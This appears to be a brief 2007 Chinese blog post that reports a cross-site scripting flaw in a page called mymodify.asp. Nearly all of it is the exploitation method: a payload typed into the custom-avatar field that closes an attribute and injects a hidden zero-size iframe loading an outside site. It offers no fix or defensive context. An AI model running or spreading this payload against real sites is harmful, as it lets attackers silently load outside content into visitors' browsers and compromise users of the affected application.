漏洞页面:mymodify.asp

利用方法:
在自定义头像中输入跨站代码:
"/>空格<iframe src=http://allyesno.cnblogs.com  width=0 height=0></iframe>

posted on 2007-07-12 09:03  %5C  阅读(260)  评论(0编辑  收藏  举报